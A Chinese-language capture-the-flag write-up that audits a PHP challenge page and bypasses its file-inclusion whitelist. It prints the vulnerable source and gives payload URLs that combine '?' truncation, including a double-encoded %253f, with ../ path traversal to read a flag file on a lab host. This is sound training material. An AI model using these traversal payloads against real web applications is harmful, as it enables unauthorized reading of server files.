根据提示,本题主要是以php代码审计为主
开启靶机后进入靶机
发现什么都没有
打开源码
发现注释中有一个提示,打开提示所在页面
<?phphighlight_file(__FILE__);class emmm{
public static function checkFile(&$page){
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {
echo "you can't see it";return false;}if (in_array($page, $whitelist)) {
return true;}$_page = mb_substr($page,0,mb_strpos($page . '?', '?'));if (in_array($_page, $whitelist)) {
return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {
return true;}echo "you can't see it";return false;}}if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {
include $_REQUEST['file'];exit;} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";}
?>
出现php代码
通过查看代码发现,此代码中存在参数 file ,并存在白名单,白名单中只有source.php hint.php
使用参数访问hint.php
发现flag在名为 ffffllllaaaagggg 的文件中,但是参数会经过 emmm 类的 checkFile 函数检查
检查中存在
$_page = mb_substr($page,0,mb_strpos($page . '?', '?'));if (in_array($_page, $whitelist)) {
return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {
return true;}echo "you can't see it";return false;
先看几个函数:
- mb_substr(): 函数返回字符串的一部分。substr() 函数,它只针对英文字符,如果要分割的中文文字则需要使用mb_substr()。
注释:如果 start 参数是负数且 length 小于或等于 start,则 length 为 0。 - mb_strpos(): 查找字符串在另一个字符串中首次出现的位置
- in_array() 函数搜索数组中是否存在指定的值。
注释:如果 search 参数是字符串且 type 参数被设置为 TRUE,则搜索区分大小写。 - urldecode(): 解码已编码的 URL 字符串
通过检查发现,可以通过绕过的方式绕过白名单,且只能在后两个 true 中操作
我们则需要控制 ? 的位置来控制截断
payload:
http://8a636392-b1c3-4fb0-a86f-2ac336df4c24.node4.buuoj.cn:81/source.php?file=hint.php?/../../../../../../ffffllllaaaagggg
或使用编码后的url,由于浏览器会解码一次,后端代码中有 urldecode 函数则 payload 中的 ? 需要经过二次编码,既 %253f 的形式
http://8a636392-b1c3-4fb0-a86f-2ac336df4c24.node4.buuoj.cn:81/source.php?file=hint.php%253f/../../../../../../ffffllllaaaagggg
得到flag